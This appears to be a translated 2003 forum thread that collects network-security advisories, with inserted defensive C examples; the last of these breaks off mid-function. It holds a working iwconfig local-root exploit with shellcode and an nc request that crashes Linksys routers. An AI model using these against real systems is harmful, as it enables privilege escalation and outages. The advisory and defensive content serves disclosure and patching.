# Software > Security > Network Level

## Mick Flemm

Topics concerning well-known programs for firewalls, routing etc. will be posted here, regardless of operating system, as well as vulnerabilities in operating systems...

----------


## Mick Flemm

*Quagga*

From the Security Focus bugtraq list...

Summary: 
-------- 
All versions of Quagga (and also GNU Zebra, from which Quagga was 
forked) are vulnerable to a remotely triggerable denial of 
service. 

Scope of vulnerability: 
----------------------- 
All versions of GNU Zebra and all versions of Quagga /prior/ to 
0.96.4, where a daemon's vty, ie the telnet CLI, is accessible to 
hostile parties. 

Impact: 
------- 
Affected daemons can be made to crash by sending a malformed telnet 
command. 

Description: 
------------ 
The vty layer, when processing the telnet sub-negotiation ends 
marker, SE, does not check whether there is sub-negotiation in 
progress, and hence will attempt to dereference a (typically) NULL 
pointer causing the daemon to crash. 

*Workaround: 
----------- 
Restrict access to daemon's telnet CLI, by either configuring each 
daemon's vty with an appropriate access-class and access-list, or by 
some external firewalling application. 
Alternatively, disable external vty access completely by removing the 
vty password (and restarting) or passing the '-P 0' parameters to the 
daemon. 

Solution: 
----------- 
Quagga version 0.96.4 contains a fix for this bug. Alternatively, one 
can manually apply the fix to whichever sources one uses currently. 
(See the RedHat bugzilla entry referenced below for the fix).* 

Credits: 
-------- 
Thanks to Jonny Robertson <jonny AT prophecy.net.nz> for finding 
and reporting this bug and Jay Fenlason <fenlason AT redhat.com> for 
fixing the bug. 

References: 
---------- 
RedHat Advisory RHSA-2003:307-09, 
http://rhn.redhat.com/errata/RHSA-2003-307.html 
RedHat Bugzilla entry 107140, 
http://bugzilla.redhat.com/bugzilla/sho ... ?id=107140 
CAN-2003-0795 

Footnote: 
--------- 
The RedHat Advisory references a second vulnerability in GNU Zebra 
and Quagga, regarding the zebra daemon accepting netlink messages 
from any user. This vulnerability will be dealt with as soon as 
possible. 
regards, 


-- 
Paul Jakma [email protected] [email protected] Key ID: 64A2FF6A 
warning: do not ever send email to [email protected] 
Fortune: 
Factorials were someone's attempt to make math LOOK exciting.
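The crash path the advisory describes (an SE processed while no sub-negotiation is open) comes down to one missing state check. As an added illustration, not Quagga's code or anything posted in this thread, here is a minimal telnet option-negotiation state machine for a vty-style CLI that keeps track of whether an IAC SB opened a buffer and ignores a stray IAC SE instead of dereferencing a NULL pointer; the struct and function names are my own and the two byte sequences fed to it are constructed:

```c
/* Added example (not Quagga's source): a telnet negotiation state machine for
 * a vty-style CLI. The security-relevant check is in vty_sb_end(): an IAC SE
 * that arrives while no IAC SB opened a sub-negotiation is counted and ignored,
 * instead of being treated as the end of a buffer that was never allocated. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

enum { TN_SE = 240, TN_SB = 250, TN_WILL = 251, TN_WONT = 252,
       TN_DO = 253, TN_DONT = 254, TN_IAC = 255 };

#define SB_MAX 64                /* cap on a sub-negotiation payload */

struct vty {
    enum { ST_DATA, ST_IAC, ST_OPT, ST_SB, ST_SB_IAC } state;
    unsigned char *sb_buf;       /* NULL whenever no sub-negotiation is open */
    size_t sb_len;
    char data[256];              /* plain bytes handed on to the command parser */
    size_t data_len;
    int stray_se;                /* SE-without-SB events seen (would-be crashes) */
    int subneg_done;             /* well-formed SB ... SE blocks completed */
};

static void vty_init(struct vty *v) { memset(v, 0, sizeof *v); }
static void vty_free(struct vty *v) { free(v->sb_buf); v->sb_buf = NULL; }

static void vty_data(struct vty *v, unsigned char c)
{
    if (v->data_len < sizeof v->data - 1)
        v->data[v->data_len++] = (char)c;
}

static int vty_sb_begin(struct vty *v)
{
    if (v->sb_buf == NULL && (v->sb_buf = calloc(SB_MAX, 1)) == NULL)
        return -1;
    v->sb_len = 0;               /* a nested SB simply restarts the payload */
    return 0;
}

static void vty_sb_end(struct vty *v)
{
    if (v->sb_buf == NULL) {     /* the check the advisory says was missing */
        v->stray_se++;
        return;
    }
    /* a real daemon would interpret sb_buf[0..sb_len) here, e.g. NAWS */
    v->subneg_done++;
    free(v->sb_buf);
    v->sb_buf = NULL;
    v->sb_len = 0;
}

/* Consume n bytes from the socket. Returns 0, or -1 when the session should
 * be dropped (allocation failure or SB payload longer than SB_MAX). */
static int vty_feed(struct vty *v, const unsigned char *in, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        unsigned char c = in[i];
        switch (v->state) {
        case ST_DATA:
            if (c == TN_IAC) v->state = ST_IAC; else vty_data(v, c);
            break;
        case ST_IAC:
            if (c == TN_SB) { if (vty_sb_begin(v) < 0) return -1; v->state = ST_SB; }
            else if (c == TN_SE) { vty_sb_end(v); v->state = ST_DATA; }
            else if (c >= TN_WILL && c <= TN_DONT) v->state = ST_OPT;
            else { if (c == TN_IAC) vty_data(v, c); v->state = ST_DATA; } /* IAC IAC, NOP, AYT... */
            break;
        case ST_OPT:                 /* option byte; a real vty answers WONT/DONT */
            v->state = ST_DATA;
            break;
        case ST_SB:
            if (c == TN_IAC) v->state = ST_SB_IAC;
            else if (v->sb_len < SB_MAX) v->sb_buf[v->sb_len++] = c;
            else return -1;
            break;
        case ST_SB_IAC:
            if (c == TN_SE) { vty_sb_end(v); v->state = ST_DATA; }
            else {                   /* IAC IAC inside SB is an escaped 0xff byte */
                if (c == TN_IAC && v->sb_len < SB_MAX) v->sb_buf[v->sb_len++] = c;
                v->state = ST_SB;
            }
            break;
        }
    }
    return 0;
}

int main(void)
{
    /* constructed input: a stray IAC SE, then a well-formed NAWS sub-negotiation */
    const unsigned char bad[]  = { TN_IAC, TN_SE, 'e', 'n' };
    const unsigned char good[] = { TN_IAC, TN_SB, 31, 0, 80, 0, 24, TN_IAC, TN_SE, 'x' };
    struct vty v;
    vty_init(&v);
    vty_feed(&v, bad, sizeof bad);
    vty_feed(&v, good, sizeof good);
    printf("stray SE ignored: %d, sub-negotiations completed: %d, cli input: %.*s\n",
           v.stray_se, v.subneg_done, (int)v.data_len, v.data);
    vty_free(&v);
    return 0;
}
```

Dropping the malformed sequence is the code-level fix; the advisory's access-class on each vty and external firewalling remain the first line of defence, since a routing daemon's telnet CLI should not be reachable from untrusted networks at all.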

----------


## Mick Flemm

*Wireless Tools*

13/11/2003 

************************************************************ 
iwconfig is a tool that manipulates the basic wireless parameters, allowing 
privilege escalation due to a buffer overflow vulnerability. iwconfig is 
not setuid by default, but I have seen in several places that it was. The following 
exploit has been released to test your servers. 



```
/*
  Name: iw-config.c
  Copyright: !sh2k+!tc2k
  Author: heka
  Date: 11/11/2003
  Greets: bx, pintos, eksol, hex, keyhook, grass, toolman, rD, shellcode,
          dunric, termid, kewlcat, JiNKS
  Description: /sbin/iwconfig - local root exploit
  iwconfig manipulate the basic wireless parameters
*/

#include <stdio.h>
#include <stdlib.h>   /* putenv */
#include <string.h>   /* memset, memcpy, strlen */
#include <unistd.h>   /* execl */

#define BIN     "/sbin/iwconfig"
unsigned char shellcode[] =
                  "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\x31\xc0\xb0\x2e"
  "\xcd\x80\x31\xc0\x53\x68\x77\x30\x30\x74\x89\xe3"
  "\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x31\xc0"
  "\x31\xdb\x31\xc9\xb1\x0a\x50\x68\x2e\x2e\x2f\x2f"
  "\xe2\xf9\x89\xe3\xb0\x0c\xcd\x80\x31\xc0\x31\xdb"
  "\x6a\x2e\x89\xe3\xb0\x3d\xcd\x80\x31\xc0\x31\xdb"
  "\x31\xc9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
  "\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd"
  "\x80\x31\xc0\x31\xdb\xb0\x01\xcd\x80";
int
main ()
{
   int x;
   char buf[97], out[1337], *buffer;
   unsigned long ret_add = 0xbffffbb8, *add_ptr;
   buffer = buf;
   add_ptr = (unsigned long *)buffer;
   /* 96-byte argument made up of the hard-coded address, NUL-terminated */
   for (x = 0; x < 97 - 1; x += 4)
      *(add_ptr++) = ret_add;
   buf[96] = '\0';
   /* environment variable OUT= carrying the payload, NUL-terminated */
   memset ((char *)out, 0x90, 1337);
   memcpy ((char *)out + 333, shellcode, strlen((char *)shellcode));
   memcpy ((char *)out, "OUT=", 4);
   out[1336] = '\0';
   putenv (out);
   execl (BIN, BIN, buf, NULL);
   return 0;
}
```

*************************************************************

----------


## Mick Flemm

*Kerio Winroute Firewall 5.10* 

Vendor: Kerio Technologies Inc. 
Vendor Site: http://www.kerio.com 
Remote: Yes 
Exploitable: Yes 
Risk level: Critical (if proxy requires authentication) 
Authors: Alexander Antipov & 3APA3A (aka Pig Killer) 
Authors Sites: http://www.securitylab.ru http://www.security.nnov.ru 

Intro: 
Winroute is the most popular SOHO software firewall/router/proxy solution 
for the Windows platform. 

Vulnerability: 
During troubleshooting of Winroute a security related problem was 
discovered allowing a remote website to obtain the cleartext credentials 
(username:password) of a WinRoute user. 

Details: 

WinRoute has extremely weak functionality as a proxy server. It doesn't 
rebuild the request sent by the browser. Instead, it only changes the Proxy-related 
headers by substituting the first character with X (so, for example, the 
Proxy-Connection header becomes Xroxy-Connection: in the outgoing request). 
This leads to a few troubles. First, it leaks HTTP established connections. 

Every file (for example .gif, html, jpg) from the web server requires a 
separate connection, resulting in performance degradation. But, of course, the 
security related problem is in the handling of the Proxy-Authorization: header sent 
by the browser. The browser sends this header with every request in case the proxy 
server requires authentication. This header contains the base64-encoded 
username and password of the proxy user in cleartext (NTLM and Kerberos 
are probably not supported by WinRoute). If WinRoute uses Windows 
authentication these credentials contain domain account information. 

As a result, any webserver visited by a WinRoute user can track his proxy 
username and password via the Xroxy-Authorization: header (X because the first 
character is changed). For example: 
Xroxy-Authorization: Basic dGVzdDp0ZXN0aW5n 
(test:testing). 

Workaround: 
*Disable proxy authentication* 

Greets: 
to Ink-Visitor who is still awaiting his document from Pig.
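To make the header handling concrete, below is an added example, not WinRoute's code, with the two behaviours side by side in C. mangle_proxy_headers() reproduces the "first character becomes X" rewrite the post describes and shows the credential still reaching the origin server; strip_proxy_headers() is what a forward proxy should do with the hop-by-hop Proxy-* request headers, and leaks_proxy_credentials() is the check an origin-side log reviewer could run. The request is constructed sample data that reuses the post's own Basic token for test:testing; function names are mine.

```c
/* Added example (not WinRoute's code): what a forward proxy must do with the
 * Proxy-* request headers. mangle_proxy_headers() mimics the behaviour the
 * advisory describes (first letter changed to 'X', header still forwarded);
 * strip_proxy_headers() removes them. SAMPLE_REQUEST is constructed data. */
#include <stdio.h>
#include <string.h>
#include <strings.h>   /* strncasecmp */

static const char SAMPLE_REQUEST[] =
    "GET http://example.invalid/ HTTP/1.0\r\n"
    "Host: example.invalid\r\n"
    "Proxy-Connection: Keep-Alive\r\n"
    "Proxy-Authorization: Basic dGVzdDp0ZXN0aW5n\r\n"   /* test:testing */
    "User-Agent: sample\r\n"
    "\r\n";

/* Length of the line starting at p, including its CRLF when present. */
static size_t line_len(const char *p)
{
    const char *eol = strstr(p, "\r\n");
    return eol ? (size_t)(eol - p) + 2 : strlen(p);
}

/* Weak rewrite from the advisory: "Proxy-Foo:" becomes "Xroxy-Foo:" and is
 * still sent to the origin server, credentials included. */
static void mangle_proxy_headers(const char *req, char *out, size_t outsz)
{
    snprintf(out, outsz, "%s", req);
    for (char *p = out; *p; p += line_len(p))
        if (strncasecmp(p, "Proxy-", 6) == 0)
            p[0] = 'X';
}

/* Hardened: drop every header whose name begins with "Proxy-" before
 * forwarding. Returns the number of headers removed, or -1 if out is too small. */
static int strip_proxy_headers(const char *req, char *out, size_t outsz)
{
    size_t o = 0;
    int removed = 0, in_headers = 1, first = 1;
    for (const char *p = req; *p; ) {
        size_t len = line_len(p);
        if (in_headers && len == 2 && p[0] == '\r')
            in_headers = 0;                     /* blank line: body follows */
        int drop = in_headers && !first && strncasecmp(p, "Proxy-", 6) == 0;
        if (drop) {
            removed++;
        } else {
            if (o + len >= outsz) return -1;
            memcpy(out + o, p, len);
            o += len;
        }
        first = 0;
        p += len;
    }
    out[o] = '\0';
    return removed;
}

/* Origin-side detection: does a received request still carry a (possibly
 * letter-swapped) "...roxy-Authorization:" header? */
static int leaks_proxy_credentials(const char *req)
{
    for (const char *p = req; *p; p += line_len(p))
        if (line_len(p) > 20 && strncasecmp(p + 1, "roxy-Authorization:", 19) == 0)
            return 1;
    return 0;
}

int main(void)
{
    char weak[512], safe[512];
    mangle_proxy_headers(SAMPLE_REQUEST, weak, sizeof weak);
    int removed = strip_proxy_headers(SAMPLE_REQUEST, safe, sizeof safe);
    printf("weak rewrite leaks credentials: %d\n", leaks_proxy_credentials(weak));
    printf("stripped %d headers, leaks: %d\n%s", removed, leaks_proxy_credentials(safe), safe);
    return 0;
}
```

The detection helper matches from the second character on purpose: an origin server that sees either spelling of the header in its access logs is looking at a misbehaving proxy upstream.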

----------


## Mick Flemm

*Open BSD*

once again i am honored to present you a generic and robust way to own
OpenBSD 2.x-3.x, enjoy

it is quite funny to name ring 0 overflow patches as "reliability fixes".
who does theo think he is fooling? kiddies in his cult?

you can patch your useless/old openbsd systems by visiting;
http://www.gentoo.org
http://www.grsecurity.net
**************************************
Added by M.F.

Grsecurity, as well as SE Linux (although the latter is a bit more peculiar/complex), are kernel patches accompanied by user-space programs that make system administration stricter; they don't exist only for BSD but also for Linux, so anyone interested in digging in should take a look at the respective sites (http://www.gentoo.org is a Linux distribution that has native support for all of this; I have it here right now and am evaluating it, it's not the best in terms of ease of use, but in terms of security it's said to be)
**************************************
- noir


from http://www.wideopenbsd.org/errata.html

All architectures

005: RELIABILITY FIX: November 4, 2003
It is possible for a local user to cause a system panic by executing
a specially crafted binary with an invalid header.
A source code patch exists which remedies the problem.


reliability ??? ehh ;-P yeah yeah right!

----------


## Mick Flemm

*The packages below were also updated in other distributions, so look for the package for your distribution...*
- ---------------------------------------------------------------------------
GENTOO LINUX SECURITY ANNOUNCEMENT 200311-01
- ---------------------------------------------------------------------------

GLSA: 200311-01
package: kde-base/kdebase
summary: KDM vulnerabilities
severity: normal
Gentoo bug: 29406
date: 2003-11-15
CVE: CAN-2003-0690 CAN-2003-0692
exploit: local / remote
affected: <=3.1.3
fixed: >=3.1.4

DESCRIPTION:

Firstly, versions of KDM <= 3.1.3 are vulnerable to a privilege escalation
bug with a specific configuration of PAM modules. Users who do not use PAM
with KDM and users who use PAM with regular Unix crypt/MD5 based
authentication methods are not affected.

Secondly, KDM uses a weak cookie generation algorithm. It is advised that
users upgrade to KDE 3.1.4, which uses /dev/urandom as a non-predictable
source of entropy to improve security.

Please look at http://www.kde.org/info/security/adviso ... 0916-1.txt for
the KDE Security Advisory and source patch locations for older versions of
KDE.

SOLUTION:

Users are encouraged to perform an 'emerge --sync' and upgrade the package to
the latest available version. KDE 3.1.4 is recommended and should be marked
stable for most architectures. Specific steps to upgrade:

emerge --sync
emerge '>=kde-base/kde-3.1.4'
emerge clean

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (Darwin)

iD8DBQE/vG2Wnt0v0zAqOHYRAr5xAKCedNRDPeH8sbW3EyX6OOSHJOL6VQCgr0ul
fnlFstGhIw3hMdoQIp07/SI=
=QD6a
-----END PGP SIGNATURE-----

- ---------------------------------------------------------------------------
GENTOO LINUX SECURITY ANNOUNCEMENT 200310-04
- ---------------------------------------------------------------------------

PACKAGE : net-www/apache
SUMMARY : buffer overflow
DATE : Fri Oct 31 07:59:00 UTC 2003
EXPLOIT : local
VERSIONS AFFECTED : <apache-2.0.48
FIXED VERSION : >=apache-2.0.48
GENTOO BUG : http://bugs.gentoo.org/show_bug.cgi?id=32271
CVE : CAN-2003-0789 CAN-2003-0542

- ---------------------------------------------------------------------------

Quote from <http://www.apache.org/dist/httpd/Announcement2.html>:

This version of Apache is principally a bug fix release. A summary of
the bug fixes is given at the end of this document. Of particular note
is that 2.0.48 addresses two security vulnerabilities:

mod_cgid mishandling of CGI redirect paths could result in CGI output
going to the wrong client when a threaded MPM is used.
[CAN-2003-0789]

A buffer overflow could occur in mod_alias and mod_rewrite when a
regular expression with more than 9 captures is configured.
[CAN-2003-0542]

This release is compatible with modules compiled for 2.0.42 and later
versions. We consider this release to be the best version of Apache
available and encourage users of all prior versions to upgrade.


SOLUTION

It is recommended that all Gentoo Linux users who are running
net-misc/apache 2.x upgrade:

emerge sync
emerge '>=net-www/apache-2.0.48'
emerge clean

Please remember to update your config files in /etc/apache2
as --datadir has been changed to /var/www/localhost.

Note that a forthcoming GLSA-200310-03 will address similar issues
in Apache 1.x.


// end

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (Darwin)

iD8DBQE/ohjbnt0v0zAqOHYRAlmaAJ0cLO512mWAXfUP5I/2HZGx0FI3dgCgmPlv
KSJYnPXDC4WjlleSR+mo2Go=
=oy6h
-----END PGP SIGNATURE-----


- ---------------------------------------------------------------------------
GENTOO LINUX SECURITY ANNOUNCEMENT 200310-03
- ---------------------------------------------------------------------------

PACKAGE : net-www/apache
SUMMARY : buffer overflow
DATE : Tue Oct 28 16:43:46 UTC 2003
EXPLOIT : local
VERSIONS AFFECTED : <apache-1.3.29
FIXED VERSION : >=apache-1.3.29
CVE : CAN-2003-0542 (under review at time of GLSA)

- ---------------------------------------------------------------------------

Quote from <http://httpd.apache.org/dev/dist/Announcement>:

This version of Apache is principally a bug and security fix release.
A partial summary of the bug fixes is given at the end of this document.
A full listing of changes can be found in the CHANGES file. Of
particular note is that 1.3.29 addresses and fixes 1 potential
security issue:

o CAN-2003-0542 (cve.mitre.org)
Fix buffer overflows in mod_alias and mod_rewrite which occurred if
one configured a regular expression with more than 9 captures.

We consider Apache 1.3.29 to be the best version of Apache 1.3 available
and we strongly recommend that users of older versions, especially of
the 1.1.x and 1.2.x family, upgrade as soon as possible. No further
releases will be made in the 1.2.x family.


SOLUTION

It is recommended that all Gentoo Linux users who are running
net-misc/apache 1.x upgrade:

emerge sync
emerge -pv apache
emerge '>=net-www/apache-1.3.29'
emerge clean
/etc/init.d/apache restart


// end

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (Darwin)

iD8DBQE/vGZWnt0v0zAqOHYRAnnUAKCf7j5ZciPl2A/lfT2G6re9L0ZjugCfQGYk
RyV+5R/BFsdAzsMYZp9dT8A=
=ym4e
-----END PGP SIGNATURE-----

- - ---------------------------------------------------------------------------
GENTOO LINUX SECURITY ANNOUNCEMENT 200311-07
- - ---------------------------------------------------------------------------

GLSA: 200311-07
package: net-libs/libnids
summary: Libnids remote code execution
severity: normal
Gentoo bug: 32724
date: 2003-11-22
CVE: CAN-2003-0850
exploit: remote
affected: <=1.17
fixed: >=1.18

DESCRIPTION:


There is a bug in the part of libnids code responsible for TCP reassembly.
The flaw probably allows remote code execution.


SOLUTION:


It is recommended that all Gentoo Linux users who are running
net-libs/libnids update their systems as follows:

emerge sync
emerge '>=net-libs/libnids-1.18'
emerge clean


- -- 
Andrea Barisani <[email protected]> .*.
Gentoo Linux Infrastructure Developer V
( )
GPG-Key 0xC9EE0905 http://dev.gentoo.org/~lcars/pubkey.asc ( )
491D E9E0 3875 0EC9 10DD 150B CAA9 2C7D C9EE 0905 ^^_^^


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)

iD8DBQE/wi78yqksfcnuCQURAmKjAJ0Y/K8Q8mbiwIvQCx44fgpNP0izoACfe4J0
q9x9uKfldu1ES92a1WP9Dyg=
=t5vz
-----END PGP SIGNATURE-----

- - ---------------------------------------------------------------------------
GENTOO LINUX SECURITY ANNOUNCEMENT 200311-06
- - ---------------------------------------------------------------------------

GLSA: 200311-06
package: dev-php/phpsysinfo
summary: phpSysInfo directory traversal
severity: normal
Gentoo bug: 26782
date: 2003-11-22
CVE: CAN-2003-0536
exploit: local
affected: <=2.1
fixed: >=2.1-r1

DESCRIPTION:


phpSysInfo contains two vulnerabilities which could allow local files to be
read or arbitrary PHP code to be executed, under the privileges of the web
server process.


SOLUTION:


It is recommended that all Gentoo Linux users who are running
dev-php/phpsysinfo upgrade to the fixed version:

emerge sync
emerge '>=dev-php/phpsysinfo-2.1-r1'
emerge clean


- -- 
Andrea Barisani <[email protected]> .*.
Gentoo Linux Infrastructure Developer V
( )
GPG-Key 0xC9EE0905 http://dev.gentoo.org/~lcars/pubkey.asc ( )
491D E9E0 3875 0EC9 10DD 150B CAA9 2C7D C9EE 0905 ^^_^^


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)

iD8DBQE/wi8LyqksfcnuCQURAmwWAJ9Ry7D8VrFpf1o2NuzqUXYsw0f8BwCfe7RV
01JaCZoERigxYEwopTsOp2U=
=MOHk
-----END PGP SIGNATURE-----

- - ---------------------------------------------------------------------------
GENTOO LINUX SECURITY ANNOUNCEMENT 200311-05
- - ---------------------------------------------------------------------------

GLSA: 200311-05
package: sys-libs/glibc
summary: Glibc getgrouplist buffer overrun vulnerability
severity: normal
Gentoo bug: 33383
date: 2003-11-22
CVE: CAN-2003-0689
affected: <=2.2.4
fixed: >=2.2.5

DESCRIPTION:


A bug in the getgrouplist function can cause a buffer overflow if the size of
the group list is too small to hold all the user's groups. This overflow can
cause segmentation faults in user applications. This vulnerability exists
only when an administrator has placed a user in a number of groups larger
than that expected by an application. 


SOLUTION:


It is recommended that all Gentoo Linux users update their systems as
follows:

emerge sync
emerge '>=sys-libs/glibc-2.2.5'
emerge clean


- -- 
Andrea Barisani <[email protected]> .*.
Gentoo Linux Infrastructure Developer V
( )
GPG-Key 0xC9EE0905 http://dev.gentoo.org/~lcars/pubkey.asc ( )
491D E9E0 3875 0EC9 10DD 150B CAA9 2C7D C9EE 0905 ^^_^^


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)

iD8DBQE/wi7zyqksfcnuCQURAvuSAJ97zIRL9qlicQB6HYG2jjoQ1Y4SLwCaAg8w
jqF5Mni+HSg5NhrUOnmOQek=
=MDV8
-----END PGP SIGNATURE-----

- - ---------------------------------------------------------------------------
GENTOO LINUX SECURITY ANNOUNCEMENT 200311-04
- - ---------------------------------------------------------------------------

GLSA: 200311-04
package: net-analyzer/ethereal
summary: Security problems in Ethereal 0.9.15
severity: normal
Gentoo bug: 32691
date: 2003-11-22
CVE: none
exploit: remote
affected: <0.9.16
fixed: >=0.9.16

DESCRIPTION:


Quote from <http://www.ethereal.com/appnotes/enpa-sa-00011.html>:

Potential security issues have been discovered in the following protocol
dissectors:

* An improperly formatted GTP MSISDN string could cause a buffer
overflow.

* A malformed ISAKMP or MEGACO packet could make Ethereal or
Tethereal crash.

* The SOCKS dissector was susceptible to a heap overflow.

Impact:

It may be possible to make Ethereal crash or run arbitrary code
by injecting a purposefully malformed packet onto the wire, or
by convincing someone to read a malformed packet trace file.

Resolution:

Upgrade to 0.9.16.

If you are running a version prior to 0.9.16 and you cannot
upgrade, you can disable the GTP, ISAKMP, MEGACO, and SOCKS
protocol dissectors by selecting Edit->Protocols... and
deselecting them from the list.


SOLUTION:


It is recommended that all Gentoo Linux users who are running
net-analyzer/ethereal 0.9.x upgrade:

emerge sync
emerge '>=net-analyzer/ethereal-0.9.16'
emerge clean


- -- 
Andrea Barisani <[email protected]> .*.
Gentoo Linux Infrastructure Developer V
( )
GPG-Key 0xC9EE0905 http://dev.gentoo.org/~lcars/pubkey.asc ( )
491D E9E0 3875 0EC9 10DD 150B CAA9 2C7D C9EE 0905 ^^_^^


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)

iD8DBQE/wi7qyqksfcnuCQURAtzrAJ9aRrV+aALW2vrSlcdgZmKshnS3kACfVz2E
IZI8yNOWjMb81RRpK6IY+wE=
=IPJD
-----END PGP SIGNATURE-----
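The glibc item (GLSA 200311-05) is also a caller-side lesson: getgrouplist() writes into a caller-supplied array, and a caller that assumes a fixed maximum number of groups is exposed whenever an administrator puts a user in more groups than that. As an added example that is neither glibc's nor Gentoo's code, the following C program starts with a deliberately tiny list, checks for the -1 "too small" result and grows the buffer before retrying; the function names, the retry limit and the macOS typedef are my own choices.

```c
/* Added example (not glibc's or Gentoo's code): calling getgrouplist() so
 * that a group list larger than the caller's buffer is handled by growing the
 * buffer, instead of trusting a fixed-size array. The loop starts deliberately
 * small so the "too small" path is exercised. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <grp.h>
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

#ifdef __APPLE__
typedef int gl_gid_t;   /* macOS declares getgrouplist() with int * */
#else
typedef gid_t gl_gid_t;
#endif

/* Fill *out (malloc'd, caller frees) with every group of `user`, always
 * including basegid. Returns the count, or -1 on failure. */
static int collect_groups(const char *user, gid_t basegid, gl_gid_t **out)
{
    int cap = 1;                       /* tiny on purpose: forces the retry path */
    gl_gid_t *list = NULL;
    for (int attempt = 0; attempt < 16; attempt++) {
        gl_gid_t *tmp = realloc(list, (size_t)cap * sizeof *tmp);
        if (tmp == NULL) { free(list); return -1; }
        list = tmp;
        int n = cap;                   /* in: capacity; out: groups stored or needed */
        if (getgrouplist(user, (gl_gid_t)basegid, list, &n) != -1) {
            *out = list;
            return n;
        }
        /* -1: list was too small. glibc reports the size needed in n; other
         * libcs leave the count stored, so doubling is the fallback. */
        cap = (n > cap) ? n : cap * 2;
    }
    free(list);
    return -1;
}

static int has_gid(const gl_gid_t *list, int n, gid_t gid)
{
    for (int i = 0; i < n; i++)
        if ((gid_t)list[i] == gid) return 1;
    return 0;
}

int main(void)
{
    struct passwd *pw = getpwuid(getuid());
    const char *user = pw ? pw->pw_name : "root";
    gid_t base = pw ? pw->pw_gid : 0;
    gl_gid_t *groups = NULL;
    int n = collect_groups(user, base, &groups);
    if (n < 0) { perror("getgrouplist"); return 1; }
    printf("%s is in %d group(s):", user, n);
    for (int i = 0; i < n; i++) printf(" %u", (unsigned)groups[i]);
    printf("\n");
    free(groups);
    return 0;
}
```

The retry loop is the part to keep: the advisory's fixed glibc stops overrunning the caller's buffer, but a caller that never checks the return value still silently truncates the group list.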

----------


## Mick Flemm

*KERNEL*

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-403-1 [email protected]
http://www.debian.org/security/ Wichert Akkerman
December 1, 2003
- ------------------------------------------------------------------------


Package : kernel-image-2.4.18-1-alpha, kernel-image-2.4.18-1-i386, kernel-source-2.4.18
Vulnerability : userland can access full kernel memory 
Problem type : local
Debian-specific: no
CVE Id(s) : CAN-2003-0961

Recently multiple servers of the Debian project were compromised using a
Debian developers account and an unknown root exploit. Forensics
revealed a burneye encrypted exploit. Robert van der Meulen managed to
decrypt the binary which revealed a kernel exploit. Study of the exploit
by the RedHat and SuSE kernel and security teams quickly revealed that
the exploit used an integer overflow in the brk system call. Using
this bug it is possible for a userland program to trick the kernel into
giving access to the full kernel address space. This problem was found
in September by Andrew Morton, but unfortunately that was too late for
the 2.4.22 kernel release.

This bug has been fixed in kernel version 2.4.23 for the 2.4 tree and
2.6.0-test6 kernel tree. For Debian it has been fixed in version
2.4.18-12 of the kernel source packages, version 2.4.18-14 of the i386
kernel images and version 2.4.18-11 of the alpha kernel images.


Upgrade instructions
- --------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

----------


## Mick Flemm

Linksys WRT54G Denial of Service Vulnerability



System(s)
===========

Tested on Linksys WRT54G v1.0 (firmware v 1.42.3)


Detail(s)
===========

Sending a blank GET request to the router on port 80 (or 8080) halts the embedded webserver. This may allow an attacker to force the owner to reboot the router, allowing them to gain sensitive information during router authentication.

Exploitation
============

```
[email protected]:~$ nc 10.0.0.1 80
GET
[email protected]:~$ nc 10.0.0.1 80
(UNKNOWN) [10.0.0.1] 80 (http) : Connection refused
[email protected]:~$
```

Solution(s)
============

- Https service should continue running for remote access.
- Scan for sniffers that might be on the network before rebooting and performing any authentication.
- Wait for a vendor patch  :: 

Status
============

Vendor contacted on 12/03/03.


!HAPPY HOLIDAYS!
[email protected] - 12/02/03
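The advisory does not say why the blank GET halts the Linksys web server, only that a request line with nothing after the method does. As an added example, not Linksys firmware, here is a request-line parser for a small embedded web server that validates the method, target and version tokens before anything else looks at them and answers 400 for the bare "GET" and for an empty line; the struct and function names are mine and the sample lines are constructed.

```c
/* Added example (not Linksys firmware): a request-line parser for a small
 * embedded web server. A bare "GET" with no target and no version, or an
 * empty line, is answered with 400 instead of being processed further. */
#include <stdio.h>
#include <string.h>

struct request_line {
    char method[8];
    char target[128];
    char version[16];
};

/* Split buf in place on single spaces into at most max tokens; returns count. */
static int split_tokens(char *buf, char *tok[], int max)
{
    int n = 0;
    for (char *p = buf; *p && n < max; ) {
        tok[n++] = p;
        char *sp = strchr(p, ' ');
        if (sp == NULL) break;
        *sp = '\0';
        p = sp + 1;
    }
    return n;
}

/* Parse one request line (CRLF or LF terminated, or unterminated). Returns 0
 * and fills *r on success, otherwise the HTTP status to answer with:
 * 400 malformed, 414 too long, 501 method not implemented. */
static int parse_request_line(const char *line, struct request_line *r)
{
    char buf[256];
    char *tok[4];
    size_t len = strcspn(line, "\r\n");
    memset(r, 0, sizeof *r);
    if (len >= sizeof buf) return 414;
    memcpy(buf, line, len);
    buf[len] = '\0';

    if (split_tokens(buf, tok, 4) != 3) return 400;   /* "GET", "GET /", "", extra tokens */
    if (strlen(tok[0]) >= sizeof r->method || strlen(tok[1]) >= sizeof r->target
        || strlen(tok[2]) >= sizeof r->version)
        return 414;
    if (strcmp(tok[0], "GET") && strcmp(tok[0], "HEAD") && strcmp(tok[0], "POST"))
        return 501;
    if (tok[1][0] != '/') return 400;                  /* origin-form targets only */
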